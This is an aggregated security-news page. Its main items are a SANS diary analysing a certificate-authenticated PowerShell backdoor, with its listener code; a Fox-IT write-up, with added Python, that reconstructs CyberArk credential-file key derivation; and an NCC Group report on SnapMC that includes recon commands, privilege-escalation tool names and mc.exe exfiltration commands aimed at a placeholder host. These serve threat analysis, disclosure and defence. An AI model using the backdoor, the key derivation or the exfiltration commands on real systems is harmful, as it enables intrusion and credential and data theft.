Security Posts

Infocon: green

Malicious PowerShell Using Client Certificate Authentication
Categories: Security Posts

Massive Phishing Campaign Domain Farm Spotted in the Wild Uses Google's Firebase Thousands of Users Affected - An OSINT Analysis

I've just stumbled across a pretty decent and massive phishing domain farm that is using Google's Firebase for the purpose of hosting and distributing rogue and malicious content. In this post I'll provide actionable intelligence on the infrastructure behind it, including an in-depth discussion of the TTPs (Tactics, Techniques and Procedures) of the cybercriminals behind it. Sample rogue and malicious URL known
Categories: Security Posts

Sinclair Confirms Ransomware Attack That Disrupted TV Stations

Threatpost - 38 min 54 sec ago
A major cyberattack resulted in data being stolen, too, but Sinclair's not sure which information is now in the hands of the crooks.
Categories: Security Posts

Vulnerability Spotlight: Multiple vulnerabilities in ZTE MF971R LTE router

Cisco Talos - 1 hour 51 min ago
Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw. Cisco Talos recently discovered multiple vulnerabilities in the ZTE MF971R LTE portable router. The MF971R is a portable router with Wi-Fi support and works as an LTE/GSM modem. An attacker could...

Categories: Security Posts

TikTok Serves Up Fresh Gamer Targets via Fake Among Us, Steam Offerings

Threatpost - 2 hours 31 min ago
The tween-friendly video app is being used to serve up malvertising, disguised as free Steam game accounts or Among Us game hacks.
Categories: Security Posts

Twitter Suspends Accounts Used to Snare Security Researchers

Threatpost - 4 hours 32 min ago
The accounts were used to catfish security researchers into downloading malware in a long-running cyber-espionage campaign attributed to North Korea.
Categories: Security Posts

BlackByte ransomware decryptor released

Zero Day | ZDNet RSS Feed - 9 hours 12 min ago
The "odd" malware avoids systems based on Russian and ex-USSR languages.
Categories: Security Posts

Cybersecurity Awareness Month: Building your career

Naked Security Sophos - 9 hours 31 min ago
Explore. Experience. Share. How to get into cybersecurity...
Categories: Security Posts

How to Switch From Google Authenticator to Another 2FA App

Wired: Security - 9 hours 55 min ago
Yes, you can choose another two-factor authentication app without getting locked out of your accounts.
Categories: Security Posts

Malicious PowerShell Using Client Certificate Authentication, (Mon, Oct 18th)

Attackers have many ways to protect their C2 servers from unwanted connections. They can check some specific headers, the user-agent, the IP address location (GeoIP), etc. I spotted an interesting PowerShell sample that implements a client certificate authentication mechanism to access its C2 server. Its VT score is 9/56[1] (SHA256: 6d3f45db0a991572a7ac8077e2fd8eec29aad99e7efa6cea5e54186ac1abc488). The certificate is Base64 encoded and protected by the password 'password' (no comment):

    $ztgMbBRW99 = '<Base64-encoded PKCS#12 blob, omitted here>'
    $QneQGddx99 = 'password'

The implementation is done via System.Security.Cryptography.X509Certificates.X509Certificate2[2]:

    $uSrbSrVp99 = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2([System.Convert]::FromBase64String($ztgMbBRW99), $QneQGddx99)
    $UAEeAVGa99 = [System.Net.Sockets.TcpListener][int]$port
    $UAEeAVGa99.start()
    $dGIDFjCR99 = $UAEeAVGa99.AcceptTcpClient()
    $pIPCBjOz99 = New-Object System.Net.Security.SslStream $dGIDFjCR99.GetStream(), $false, ({$True} -as [Net.Security.RemoteCertificateValidationCallback])
    $pIPCBjOz99.AuthenticateAsServer($uSrbSrVp99, $false, [System.Security.Authentication.SslProtocols]::Tls, $false)

The class X509Certificate2 expects a certificate in PFX or PKCS12 format. Let's try to decode the one present in the script using OpenSSL:

    $ openssl pkcs12 -in payload.cert
    Enter Import Password:
    MAC verified OK
    Bag Attributes
        localKeyID: FB 69 28 8A 7B F7 EB C0 B7 7A EC AE 0A 17 64 A0 A4 17 94 9E
    subject=/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com
    issuer=/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com
    -----BEGIN CERTIFICATE-----
    <PEM certificate body omitted here>
    -----END CERTIFICATE-----

Subject and issuer are identical, so the certificate is self-signed; note also that the script's RemoteCertificateValidationCallback is a constant {$True}, so it accepts any peer certificate. Once the connection is established, the script enters an infinite loop and waits for commands. Data is delivered via JSON objects:

    try {
        $type = ($veAsxeZF99 | ConvertFrom-Json).type
        $zxrTrFRw99 = ($veAsxeZF99 | ConvertFrom-Json).data
        $EBZtfXQJ99 = ($veAsxeZF99 | ConvertFrom-Json).sendoutput
        $ucyYeLLE99 = ($veAsxeZF99 | ConvertFrom-Json).multiple
        $data = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($zxrTrFRw99))
        $extra = ($veAsxeZF99 | ConvertFrom-Json).extra
    } catch { continue }

The received payload in $data is executed and the output is sent back to the C2. The fact that the certificate is stored in the script makes the debugging easy, but this technique can indeed defeat simple scanners or automated checks!

[1] https://www.virustotal.com/gui/file/6d3f45db0a991572a7ac8077e2fd8eec29aad99e7efa6cea5e54186ac1abc488
[2] https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.x509certificates.x509certificate2?view=net-5.0

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
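As an added example (not from the diary or the sample), a stdlib-only Python check that finds long Base64 literals in a PowerShell script and tests whether they decode to a PKCS#12 container, the way the sample above embeds its certificate. The script it scans is constructed here to mimic the sample's layout; SAMPLE_PREFIX is the first 32 Base64 characters of the blob quoted in the diary.

```python
"""Spot Base64 literals in a PowerShell script that decode to a PKCS#12 (PFX) container."""
import base64
import re

# A PowerShell variable assigned a long quoted Base64 literal. Assumption: the whole
# blob sits in one literal, as in the sample discussed above.
LITERAL_RE = re.compile(r"(\$\w+)\s*=\s*['\"]([A-Za-z0-9+/=\s]{200,})['\"]")

# OID 1.2.840.113549.1.7.1 (pkcs7-data): the contentType every PFX authSafe starts with.
PKCS7_DATA_OID = bytes.fromhex("2a864886f70d010701")

# First 32 Base64 characters of the blob quoted in the diary (enough to see the PFX header).
SAMPLE_PREFIX = "MIIJeQIBAzCCCT8GCSqGSIb3DQEHAaCC"


def der_tlv(buf: bytes, pos: int):
    """Decode one DER tag/length at buf[pos]; return (tag, value_start, value_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def looks_like_pkcs12(der: bytes) -> bool:
    """PFX ::= SEQUENCE { version INTEGER (3), authSafe ContentInfo, ... } where
    ContentInfo opens with the pkcs7-data OID. Only the header is inspected, so a
    truncated blob is enough to classify."""
    try:
        tag, pos, _ = der_tlv(der, 0)
        if tag != 0x30:
            return False
        tag, start, end = der_tlv(der, pos)           # version
        if tag != 0x02 or der[start:end] != b"\x03":
            return False
        tag, pos, _ = der_tlv(der, end)               # authSafe ContentInfo
        if tag != 0x30:
            return False
        tag, start, end = der_tlv(der, pos)           # contentType
        return tag == 0x06 and der[start:end] == PKCS7_DATA_OID
    except IndexError:
        return False


def is_pkcs12_base64(text: str) -> bool:
    """Decode a (possibly line-wrapped) Base64 string and test it for the PFX header."""
    try:
        return looks_like_pkcs12(base64.b64decode(re.sub(r"\s+", "", text), validate=True))
    except ValueError:
        return False


def find_embedded_pkcs12(script: str):
    """Return [(variable, decoded_length)] for every literal that is a PFX container."""
    hits = []
    for m in LITERAL_RE.finditer(script):
        if is_pkcs12_base64(m.group(2)):
            hits.append((m.group(1), len(base64.b64decode(re.sub(r"\s+", "", m.group(2))))))
    return hits


def der(tag: int, content: bytes) -> bytes:
    """Minimal DER encoder, used only to build the constructed test blob."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


# Constructed PFX-shaped blob: version 3, authSafe wrapping pkcs7-data with dummy content.
FAKE_PFX = der(0x30, der(0x02, b"\x03")
               + der(0x30, der(0x06, PKCS7_DATA_OID) + der(0xA0, der(0x04, bytes(300)))))

# Constructed script mirroring the sample's layout; the second long literal is a
# harmless Base64 string and must not be flagged.
SAMPLE_SCRIPT = f"""
$port = 4444
$ztgMbBRW99 = '{base64.b64encode(FAKE_PFX).decode()}'
$QneQGddx99 = 'password'
$uSrbSrVp99 = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2([System.Convert]::FromBase64String($ztgMbBRW99), $QneQGddx99)
$banner = '{base64.b64encode(b"just a harmless greeting string " * 8).decode()}'
"""

if __name__ == "__main__":
    print(find_embedded_pkcs12(SAMPLE_SCRIPT))
```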
Categories: Security Posts

Hands-on domain password policy setup for Active Directory

AlienVault Blogs - 10 hours 55 min ago
This blog was written by an independent guest blogger.

Dealing with the massive architecture of client-server networks requires effective security measures. Everyone has become painfully aware of all the dangerous fishes roaming around the pool of the network, trying to get access to the system. Having a weak password policy is a key vector for attackers to gain system access. However, admins can help protect password security of the wide-reaching network using Group Management Policy (GPO). Let's get rolling on how we can configure Domain Password Policy for Active Directory.

But what's domain password policy?

To harden the client's passwords, Active Directory (AD) has a feature of default domain password policy. The policy says:
  • Use encryption for passwords.
  • Use long character passwords.
  • Expire passwords after some time, and so on.
This policy helps to mitigate password attacks like brute force by pairing with several other policies like lockout policy.

Configure domain password policy

Password policies come under the group policy, which relates to the root domain. Follow these steps to configure the domain password policy.
  • Run the 'gpmc.msc' command to open the Group Policy Management console in the Windows Server.
  • Expand the window's left pane.
Group Policy Management -> Domains -> Group Policy Objects -> Default Domain Policy.
  • Open the Group Policy Management Editor by right-clicking on the Default Domain Policy and select edit.
  • A new window will pop up. Navigate to the Password Policy node from the left pane to see the policies on the right-side pane.
Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Account Policies -> Password Policy
  • Double-click any password policy you want to modify from the list.
  • I am selecting a Minimum Password Length policy.
Change the value -> Apply setting -> Click Ok.

View domain password policy through PowerShell
  • Search the PowerShell from the start -> Run it with admin rights.
  • Enter the command -> Get-ADDefaultDomainPasswordPolicy
Guidelines for creating a password policy

The password policy must ensure that user account passwords are sufficiently unique, strong, and reset promptly. Several compliance regulations, such as PCI-DSS, HIPAA, SOX, NIST, and more, have set password policy standards. The Password Policy Microsoft recommends is:
  • Enforce Password History with a value of 24. It will help reduce the risks associated with password reuse.
  • Based on the situation, set the Maximum Password Age to 30 to 90 days. A hacker will only have a short period to break a user's password and get admin rights to network services.
  • We should set the Minimum Password Age to one day, as per Windows security baselines. When the duration is 0, you can change your password right away. That's not a good option to use.
  • Set the Minimum Password Length to at least eight characters. An eight-character password is suggested for most situations as it's strong enough to offer protection while remaining concise for people to memorize.
  • Enable Password Must Meet Complexity setting. This policy option, paired with an 8-character minimum password length, guarantees that a unique password has at least 218,340,105,584,896 distinct combinations. A brute force attack is challenging, but not unattainable, with this option.
  • Disable Store Passwords Using Reversible Encryption. Enable it if you utilize CHAP through remote access or IAS or Digest Authentication in IIS.
It's a good practice to adopt the Windows recommendations, but you may also utilize options other than the Domain Password Policy.
  • Passwords and lockout policies go together. The lockout policy prohibits hackers from employing brute-force attacks or dictionaries to acquire full rights to the network. If the hacker gets the username, he can attempt several password combos. The lockout will keep the amount of failed login tries to a minimum.
  • If a user's password is about to expire, email notifications can act as a reminder. Users can receive email prompts when it's due to update their passwords before they expire.
  • Admins should perform password audits periodically to prevent attacks from massive password dictionaries.
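Added example (not part of the AlienVault post): a Python check that parses the default list output of Get-ADDefaultDomainPasswordPolicy, the cmdlet used in the PowerShell step above, and compares it with the baseline just given (24 remembered passwords, a 30 to 90 day maximum age, a 1 day minimum age, at least 8 characters, complexity on, reversible encryption off, lockout enabled). The two policy dumps are constructed; the property names are the cmdlet's own.

```python
"""Audit Get-ADDefaultDomainPasswordPolicy output against the baseline in the post above."""
import re
from datetime import timedelta

# Constructed dump in the cmdlet's default "Name : Value" list layout, using the property
# names the cmdlet emits. The values are invented to show a weak policy.
WEAK_POLICY = """
ComplexityEnabled           : False
DistinguishedName           : DC=corp,DC=example
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 0
MaxPasswordAge              : 180.00:00:00
MinPasswordAge              : 00:00:00
MinPasswordLength           : 7
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : True
"""

# Constructed dump of a policy that meets the baseline.
GOOD_POLICY = """
ComplexityEnabled           : True
DistinguishedName           : DC=corp,DC=example
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 5
MaxPasswordAge              : 60.00:00:00
MinPasswordAge              : 1.00:00:00
MinPasswordLength           : 12
PasswordHistoryCount        : 24
ReversibleEncryptionEnabled : False
"""

TIMESPAN_RE = re.compile(r"(?:(\d+)\.)?(\d+):(\d+):(\d+)(?:\.\d+)?")


def parse_timespan(text: str) -> timedelta:
    """PowerShell prints a TimeSpan as [days.]hh:mm:ss[.fraction]."""
    m = TIMESPAN_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"not a TimeSpan: {text!r}")
    days, hours, minutes, seconds = (int(x or 0) for x in m.groups())
    return timedelta(days=days, hours=hours, minutes=minutes, seconds=seconds)


def parse_policy(text: str) -> dict:
    """Turn the list output into typed values: bool, int, timedelta or str."""
    policy = {}
    for line in text.splitlines():
        name, sep, value = line.partition(":")
        if not sep:
            continue
        name, value = name.strip(), value.strip()
        if value in ("True", "False"):
            policy[name] = value == "True"
        elif value.isdigit():
            policy[name] = int(value)
        elif TIMESPAN_RE.fullmatch(value):
            policy[name] = parse_timespan(value)
        else:
            policy[name] = value
    return policy


def audit(policy: dict) -> dict:
    """Return {setting: reason} for every setting that falls below the baseline."""
    findings = {}
    if policy["PasswordHistoryCount"] < 24:
        findings["PasswordHistoryCount"] = f"{policy['PasswordHistoryCount']} remembered, baseline is 24"
    max_age = policy["MaxPasswordAge"]
    if not timedelta(days=30) <= max_age <= timedelta(days=90):
        findings["MaxPasswordAge"] = f"{max_age.days} days, baseline is 30 to 90 days"
    if policy["MinPasswordAge"] < timedelta(days=1):
        findings["MinPasswordAge"] = "below 1 day, so a user can cycle straight back to an old password"
    if policy["MinPasswordLength"] < 8:
        findings["MinPasswordLength"] = f"{policy['MinPasswordLength']} characters, baseline is at least 8"
    if not policy["ComplexityEnabled"]:
        findings["ComplexityEnabled"] = "complexity requirement is off"
    if policy["ReversibleEncryptionEnabled"]:
        findings["ReversibleEncryptionEnabled"] = "reversible encryption stores passwords recoverably"
    if policy["LockoutThreshold"] == 0:
        findings["LockoutThreshold"] = "0 means no account lockout, so online guessing is unlimited"
    return findings


if __name__ == "__main__":
    for setting, reason in audit(parse_policy(WEAK_POLICY)).items():
        print(f"{setting}: {reason}")
```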
In a nutshell

Within a domain structure, users are the easy targets. The account login and password may be the only security precautions in place to secure their devices. Although the username may be simple to predict, we must not tolerate weak passwords. Inside an AD domain, the Default Password Policy prevents users from setting simple passwords. However, you may want to change this password policy in rare situations because of restrictions or the usage of apps. Always follow best practices when changing the password policy options.
Categories: Security Posts

What skills a technical person needs to be a good CTO and not confirm the Peter Principle #HackYourCareer

Un informático en el lado del mal - 10 hours 57 min ago
When I began, at 24, the journey of running Informática 64, I was a 100% hands-on person. I needed to do everything myself. The tasks that fell on my side I always did myself, in my own way and manner, striving to learn to do them better. However, as time went by I had to learn to do other tasks that I had not learned at university: managing teams.
Figure 1: What skills a technical person needs to be a good CTO and not confirm the Peter Principle #HackYourCareer
Managing a team of people is a complex task. And there is no single way to do it, of course not. Over the last 22 years leading teams of professionals towards very diverse goals, I have had to learn a great deal, and a great variety, about how to do it.
Today, with the experience of the years, I know that when someone puts "ability to lead teams" on their CV, I do not always understand the same thing by it as others do, because managing a sales team, a management team and a technical team are very different things. And managing all the teams so that they work in step like an orchestra is the job of a COO or a CEO, which you learn when you have managed a P&L - preferably one that affects your own pocket - and all the decisions needed to deliver the Business Plan. Among them, of course, those related to technology.
The CTO and the Peter Principle
Focusing now on the world of technology, there is a maxim that often applies in these organizations, and it is the famous Peter Principle. In other words, a good developer, a good Software Architect, a good IT Administrator becomes a terrible CTO when promoted. Simply because they have not learned something I always talk about with my technical friends:
- "You have to learn to paint with other people's hands. You have to learn to build technology with the hands of your developers."
I always use the metaphor of the great artists, painters, sculptors and so on, who have a workshop with young painters, or sculptors who work the materials well, or simply assistants, who prepare the work and execute the artists' ideas. It is the artist's job to create the work, but they rely on a large number of workers who paint on their canvases, who work on their ideas, on their works. They are assistants in giving shape to and executing the artist's vision.
Figure 2: Interview with Marc Oliveras, Head of Bumble Barcelona
The brilliant artist Okuda, famous for his works all over the world, has a workshop where other painters, assistants and 3D design workers are there to help him create the work he has seen in his head, that he has captured in his sketches, in his designs. He creates the work with the help of other people's hands.
This is the job of a C-Level. Being able to do work that will be their own responsibility with the hands of the people on their teams. And this, in the case of the CTO, where the vast majority of CTOs have been great developers, software architects or system administrators, is the great challenge. Going from being 100% hands-on to being able to create technology with the hands of their teams. And they do not always succeed.
New skills
When you have to manage a technical team so that it sounds like an orchestra, you have to develop new capabilities. Not all people are the same, nor do they have the same motivations, nor do they run on the same motivations. Social and personal skills and talent management are a fundamental necessity to fit the pieces together, but discipline and method are also needed to play the score.
Figure 3: Interview with Fernando Díaz, CTO of Mercadona Tech
A CTO must know how to manage an organization, creating processes, methodologies, routines and habits that help build a team that can deal with external contextual situations and the problems and vicissitudes of day-to-day life. And you also have to choose which instruments will be used so that everyone works in a coordinated way.
That is, a great Software Architect does not necessarily have to be a good CTO, and it is necessary to learn skills to fulfil that role properly. Establishing the working methodology, caring about the quality and security of the software, aligned with the corporation's timelines and resources, managing talent, choosing the technology "stack" and defining the control mechanisms is the job of a good CTO.
Online BootCamp in Tech Management & Leadership
I have been lucky to work with great CTOs on my teams, and it has always been necessary to establish all this work at the beginning and look after it day by day. So if you want to make the leap to being a CTO, you need to master these disciplines.
Figure 4: Online BootCamp Tech Management & Leadership
I am a PhD in Computer Science who has studied everything to do with technology, and I have had to be C-Level in technology companies since I was very young. My whole professional career. I have had to learn to paint with other people's hands while at the same time understanding the technology we had in our hands, to create things that seemed impossible.
Figure 5: First part of the syllabus of the Online BootCamp in Tech Management & Leadership
That is why, when we talked with the colleagues at GeeksHubs Academy about helping professionals grow their careers, it was clear to me that technology people must be trained to be C-Level, to govern teams while understanding the technology. And that is why the Online BootCamp in Tech Management & Leadership exists, because, I repeat, being a CTO is not being the one who knows the most about a given technology, but the one who knows how to build technology with the hands of many engineers.
Figure 6: Second part of the syllabus of the Online BootCamp in Tech Management & Leadership
And until you learn this, you will not be able to rise to the C level. To the "Chief" level. To do so, you need to learn that doing this does not mean "ordering it to be done", but knowing that it is about being able to "manage the team so that it happens", which is different.
¡Saludos Malignos!
Author: Chema Alonso (Contact Chema Alonso)


Categories: Security Posts

ISC Stormcast For Monday, October 18th, 2021 https://isc.sans.edu/podcastdetail.html?id=7716, (Mon, Oct 18th)

Categories: Security Posts

Reverse engineering and decrypting CyberArk vault credential files

Fox-IT - Tue, 2021/10/12 - 09:42
Author: Jelle Vergeer

This blog will be a technical deep-dive into CyberArk credential files and how the credentials stored in these files are encrypted and decrypted. I discovered it was possible to reverse engineer the encryption and key generation algorithms and decrypt the encrypted vault password. I also provide a python implementation to decrypt the contents of the files.

Introduction

It was a bit more than a year ago that we did a penetration test for a customer where we came across CyberArk. During the penetration test we tested the implementation of their AD tiering model and they used CyberArk to implement this. During the penetration test we were able to get access to the CyberArk Privileged Session Manager (PSM) server. We found several .cred CyberArk related files on this server. At the time of the assignment I suspected the files were related to accessing the CyberArk Vault. This component stores all passwords used by CyberArk. The software seemed to be able to access the vault using the files with no additional user input necessary. These credential files contain several fields, including an encrypted password and an “AdditionalInformation” field. I immediately suspected I could reverse or break the crypto to recover the password, though the binaries were quite large and complex (C++ classes everywhere). A few months later during another assignment for another customer we again found CyberArk related credential files, but again, nobody knew how to decrypt them. So during a boring COVID stay-at-home holiday I dove into the CreateCredFile.exe binary, used to create new credential files, and started reverse engineering the logic. Creating a dummy credential file using the CreateCredFile utility looks like the following:

Figure: Creating a new credential file with CreateCredFile.exe
Figure: The created test.cred credential file

The encryption and key generation algorithms

It appears there are several types of credential files (Password, Token, PKI, Proxy and KeyPair).
For this exercise we will look at the password type. The details in the file can be encrypted using several algorithms:
  • DPAPI protected machine storage
  • DPAPI protected user storage
  • Custom
The default seemed to be the custom one, and after some effort I started to understand the logic of how the software encrypts and decrypts the password in the file. The encryption algorithm is roughly the following: First the software generates 20 random bytes and converts this to a hexadecimal string. This string is stored in the internal CCAGCredFile object for later use. This basically is the “AdditionalInformation” field in the credential files. When the software actually enters the routine to encrypt the password, it will generate a string that will be used to generate the final AES key. I will refer to this string as the base key. This string will consist of the following parts, appended together:
  • The Application Type restriction, converted to lower case, hashed with SHA1 and base64 encoded.
  • The Executable Path restriction, converted to lower case.
  • The Machine IP restriction.
  • The Machine Hostname restriction, converted to lower case.
  • The OS Username restriction, converted to lower case.
  • The 20 random bytes, or AdditionalInformation field.
Figure: An example base string that will be used to generate the AES key

Note that by default, the software will not apply the additional restrictions, only relying on the additional info field present in the credential files. After the base key is generated, the software will generate the actual encryption key used for encrypting and decrypting credentials in the credential files. It will start by creating a SHA1 context, and update the context with the base key. Next it will create two copies of the context. The first context is updated with the integer ‘1’, and the second is updated with the integer ‘2’, both in big endian format. The finalized digest of the first context serves as the first part of the key, appended by the first 12 bytes of the finalized second digest. The AES key is thus 32 bytes long. When encrypting a value, the software generates some random bytes to use as initialization vector (IV), and stores the IV in the first block of encrypted bytes. Furthermore, when a value is encrypted, the software will encrypt the value itself, combined with the hash of the value. I assume this is done to verify the decryption routine was successful and the data is not corrupted.

Decrypting credential files

Because, by default, the software will only rely on the random bytes as base key, which are included in the credential file, we can generate the correct AES key to decrypt the encrypted contents in the file. I implemented a Python utility to decrypt CyberArk Credential files and it can be downloaded here. The additional verification attributes the software can use to include in the base key can be provided as command line arguments to the decryption tool. Most of these can be either guessed, or easily discovered, as an attacker will most likely already have a foothold in the network, so a hostname or IP address is easily uncovered.
In some cases the software even stores these verification attributes in the file, as it asks to include the restrictions in the credential file when creating one using the CreateCredFile.exe utility.

Figure: Decrypting a credential file using the decryption tool.

Defense

How to defend against attackers decrypting the CyberArk vault password in these credential files? First off, prevent an attacker from gaining access to the credential files in the first place. Protect your credential files and don’t leave them accessible by users or systems that don’t need access to them. Second, when creating credential files using the CreateCredFile utility, prefer the “Use Operating System Protected Storage for credentials file secret” option to protect the credentials with an additional (DPAPI) encryption layer. If this encryption is applied, an attacker will need access to the system on which the credential file was generated in order to decrypt the credential file.

Responsible Disclosure

We reported this issue at CyberArk and they released a new version mitigating the decryption of the credential file by changing the crypto implementation and making the DPAPI option the default. We did not have access to the new version to verify these changes.

Timeline:
20-06-2021 – Reported issue at CyberArk.
21/23/27/28-06-2021 – Communication back and forth with questions and explanation.
29-06-2021 – Call with CyberArk. They released a new version which should mitigate the issue.
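As an added example (not the author's decryption tool), a Python reconstruction of the key-derivation steps described above: the base-key concatenation and the two-SHA1 expansion into a 32-byte AES key. It assumes the fields are ASCII, that a restriction which was not applied contributes nothing (the default case, where only AdditionalInformation feeds the key), and that AdditionalInformation is the 20 random bytes as a 40-character hex string; the AES decryption itself is outside the standard library and is not shown.

```python
"""Reconstruct the CyberArk 'Custom' credential-file key derivation described above."""
import base64
import hashlib
import os
from typing import Optional


def new_additional_info() -> str:
    """The 20 random bytes CreateCredFile generates, stored hex-encoded as AdditionalInformation."""
    return os.urandom(20).hex()


def build_base_key(additional_info: str, app_type: Optional[str] = None,
                   exe_path: Optional[str] = None, machine_ip: Optional[str] = None,
                   hostname: Optional[str] = None, os_user: Optional[str] = None) -> str:
    """Concatenate the restriction fields in the order listed above, then AdditionalInformation.
    Assumption: a restriction that was not applied contributes nothing, matching the default
    file that relies on AdditionalInformation alone."""
    parts = []
    if app_type is not None:          # lower-cased, SHA1-hashed, Base64-encoded
        parts.append(base64.b64encode(hashlib.sha1(app_type.lower().encode()).digest()).decode())
    if exe_path is not None:          # lower-cased
        parts.append(exe_path.lower())
    if machine_ip is not None:        # used as-is
        parts.append(machine_ip)
    if hostname is not None:          # lower-cased
        parts.append(hostname.lower())
    if os_user is not None:           # lower-cased
        parts.append(os_user.lower())
    parts.append(additional_info)
    return "".join(parts)


def derive_aes_key(base_key: str) -> bytes:
    """SHA1 over the base key, forked into two contexts updated with big-endian 1 and 2;
    key = digest1 (20 bytes) || digest2[:12], giving the 32-byte AES key."""
    ctx = hashlib.sha1(base_key.encode())    # assumption: the base key is ASCII
    ctx1, ctx2 = ctx.copy(), ctx.copy()
    ctx1.update((1).to_bytes(4, "big"))
    ctx2.update((2).to_bytes(4, "big"))
    return ctx1.digest() + ctx2.digest()[:12]


if __name__ == "__main__":
    info = new_additional_info()
    # Default file: only AdditionalInformation feeds the key, so the file alone is enough.
    print(derive_aes_key(build_base_key(info)).hex())
    # With an OS-user restriction the same file yields a different key.
    print(derive_aes_key(build_base_key(info, os_user="SVC-Account")).hex())
```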
Categories: Security Posts

SnapMC skips ransomware, steals data

Fox-IT - Mon, 2021/10/11 - 21:15
Over the past few months NCC Group has observed an increasing number of data breach extortion cases, where the attacker steals data and threatens to publish said data online if the victim decides not to pay. Given the current threat landscape, most notable is the absence of ransomware or any technical attempt at disrupting the victim’s operations. Within the data breach extortion investigations, we have identified a cluster of activities defining a relatively constant modus operandi described in this article. We track this adversary as SnapMC and have not yet been able to link it to any known threat actors. The name SnapMC is derived from the actor’s rapid attacks, generally completed in under 30 minutes, and the exfiltration tool mc.exe it uses.

Extortion emails threatening their recipients have become a trend over time. The lion’s share of these consists of empty threats sent by perpetrators hoping to profit easily without investing in an actual attack. The extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate. These deadlines are rarely abided by, since we have seen the attacker start increasing the pressure well before the countdown hits zero. SnapMC includes a list of the stolen data as evidence that they have had access to the victim’s infrastructure. If the organization does not respond or negotiate within the given timeframe, the actor threatens to (or immediately does) publish the stolen data and informs the victim’s customers and various media outlets.

Modus Operandi

Initial Access

At the time of writing NCC Group’s Security Operations Centers (SOCs) have seen SnapMC scanning for multiple vulnerabilities in both webserver applications and VPN solutions. We have observed this actor successfully exploiting and stealing data from servers that were vulnerable to:
  • Remote code execution in Telerik UI for ASPX.NET [1]
  • SQL injections
After successfully exploiting a webserver application, the actor executes a payload to gain remote access through a reverse shell. Based on the observed payloads and characteristics the actor appears to use a publicly available Proof-of-Concept Telerik Exploit [2]. Directly afterwards PowerShell is started to perform some standard reconnaissance activity:
  • whoami
  • whoami /priv
  • wmic logicaldisk get caption,description,providername
  • net users /priv
Note that in the last command the adversary used the ‘/priv’ option, which is not a valid option for the net users command.

Privilege Escalation

In most of the cases we analyzed the threat actor did not perform privilege escalation. However, in one case we did observe SnapMC trying to escalate privileges by running a handful of PowerShell scripts:
  • Invoke-Nightmare [3]
  • Invoke-JuicyPotato [4]
  • Invoke-ServiceAbuse [4]
  • Invoke-EventVwrBypass [6]
  • Invoke-PrivescAudit [7]
Collection & Exfiltration

We observed the actor preparing for exfiltration by retrieving various tools to support data collection, such as 7zip and Invoke-SQLcmd scripts. Those, and artifacts related to the execution or usage of these tools, were stored in the following folders:
  • C:\Windows\Temp\
  • C:\Windows\Temp\Azure
  • C:\Windows\Temp\Vmware
SnapMC used the Invoke-SQLcmd PowerShell script to communicate with the SQL database and export data. The actor stored the exported data locally in CSV files and compressed those files with the 7zip archive utility. The actor used the MinIO [8] client to exfiltrate the data. Using the PowerShell commandline, the actor configured the exfil location and key to use, which were stored in a config.json file. During the exfiltration, MinIO creates a temporary file in the working directory with the file extension […].par.minio.

    C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set <DIR> <EXFIL_LOCATION> <API key> <API SECRET>
    C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure cp --recursive [DIR NAME] <CONFIGURED DIRECTORY>/<REMOTE DIRECTORY>/<VICTIM DIRECTORY>

Mitigations

First, initial access was generally achieved through known vulnerabilities, for which patches exist. Patching in a timely manner and keeping (internet connected) devices up-to-date is the most effective way to prevent falling victim to these types of attacks. Make sure to identify where vulnerable software resides within your network by (regularly performing) vulnerability scanning. Furthermore, third parties supplying software packages can make use of the vulnerable software as a component as well, leaving the vulnerability outside of your direct reach. Therefore, it is important to have an unambiguous mutual understanding and clearly defined agreements between your organization and the software supplier about patch management and retention policies. The latter also applies to a possible obligation to have your supplier provide you with your systems for forensic and root cause analysis in case of an incident. Worth mentioning, when reference testing the exploitability of specific versions of Telerik it became clear that when the software component resided behind a well configured Web Application Firewall (WAF), the exploit would be unsuccessful.
Finally, having properly implemented detection and incident response mechanisms and processes seriously increases the chance of successfully mitigating severe impact on your organization. Timely detection and efficient response will reduce the damage even before it materializes.

Conclusion

NCC Group's Threat Intelligence team predicts that data breach extortion attacks will increase over time, as they take less time, and even less technical in-depth knowledge or skill, in comparison to a full-blown ransomware attack. In a ransomware attack, the adversary needs to achieve persistence and become domain administrator before stealing data and deploying ransomware. In data breach extortion attacks, most of the activity could even be automated and takes less time while still having a significant impact. Therefore, making sure you are able to detect such attacks, in combination with having an incident response plan ready to execute at short notice, is vital to efficiently and effectively mitigate the threat SnapMC poses to your organization.

MITRE ATT&CK mapping

  Tactic | Technique | Procedure
  Reconnaissance | T1595.002 – Vulnerability Scanning | SnapMC used the Acunetix vulnerability scanner to find systems running vulnerable Telerik software.
  Initial Access | T1190 – Exploit Public-Facing Application(s) | SnapMC exploited CVE-2019-18935 and SQL injection.
  Privilege Escalation | | SnapMC used a combination of PowerShell cmdlets to achieve privilege escalation.
  Execution | T1059.001 – PowerShell | SnapMC used a combination of publicly available PowerShell cmdlets.
  Collection | T1560.001 – Archive via Utility | SnapMC used 7zip to prepare data for exfiltration.
